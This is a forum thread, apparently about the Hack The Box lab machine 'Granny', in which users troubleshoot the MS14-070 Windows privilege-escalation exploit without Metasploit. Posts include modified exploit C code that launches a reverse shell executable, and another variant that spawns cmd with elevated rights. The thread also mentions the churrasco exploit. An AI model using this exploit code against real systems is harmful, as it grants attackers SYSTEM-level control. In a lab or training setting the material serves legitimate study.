Granny privesc (MS14-070) WITHOUT meterpreter

aas · February 4, 2018, 2:34pm

Hi,

I try to pwn Granny again, without meterpreter. I’m stuck with privesc (MS14-070 : Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) - Windows local Exploit).

I modify the exploit like this :

BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
 
        // Start the child process.
        return CreateProcess (
                NULL,                                                           // No module name (use command line)
                //"c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
                "c:\\Inetpub\\wwwroot\\revshell.exe",   // Start reverse shell

                NULL,                                                           // Process handle not inheritable
                NULL,                                                           // Thread handle not inheritable
                TRUE,                                                           // Set handle inheritance to TRUE
                0,                                                              // No creation flags
                NULL,                                                           // Use parent's environment block
                NULL,                                                           // Use parent's starting directory
                &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
        );
}

When I execute this exploit from cmd.exe (or command shell from meterpreter), it spawns a reverse shell but dies just after. No matter what payload I use (meterpreter, windows_reverse_shell, ncat.exe, etc).

But, when I execute -f MS14-070.exe from meterpreter, it opens just fine.

How can I have the same behaviour than meterpreter’s execute -f for cmd.exe ?

In this video, the user has the exact same problem (he finally managed to have reverse shell, but used meterpreter’s execute -f command) :

thed4ve · August 17, 2019, 8:56pm

Hey man, I’m stucked at the same point. Did you find a way to solve it?

scud78 · December 29, 2019, 11:33am

cmd /K or start

hackerintshell · December 30, 2019, 1:14am

Hi,

try this:


BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        startupInformation->lpDesktop = "WinSta0\\Default";
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

        LPTSTR lpComspec;
        lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
        GetEnvironmentVariable("comspec", lpComspec, 1024); 

        return CreateProcess (
                lpComspec,
                NULL,
                NULL,
                NULL,
                TRUE,
                0,
                NULL,
                NULL,
                &startupInformation[0],
                &processInformation[0]
        );
}

scud78 · December 30, 2019, 2:36pm

@hackerintshell that will only work if you have an interactive session, meaning remote desktop or at the actual keyboard. And it would only pop a console window, not actually run anything else.

The issue is the /C, which closes the console as soon as the command has run, terminating any threads living in the background. /K will keep it open, along with any children it’s started.

hackerintshell · December 30, 2019, 6:11pm

@scud78 I tried it now and it worked for me. The EoP was made in the same reverse shell.

scud78 · December 30, 2019, 7:01pm

@hackerintshell how? %comspec% is just cmd, and you’re not passing any arguments.

csuki · January 31, 2020, 1:03pm

@hackerintshell I just logged in to thank you, it works!

peek · February 1, 2020, 10:58pm

could you upload the binary ?

rhinokey · February 10, 2020, 5:24pm

I’ve spent around 3 hours today fighting with this box without MSF. Like others, I’m heading toward the OSCP and am doing my best to avoid Metasploit.

It can be done. My experience was buggy, the reverse shell would time out each time in under a minute. You need the churrasco exploit. The forum keeps blocking me if I try to give any more detail.

denvhatt · October 21, 2020, 2:47pm

@hackerintshell Amazing! It works.

It would be really nice if you can explain the details of this change, why this is needed. It seams like it needs some kind of desktop env session?

I will give you my respect! Thanks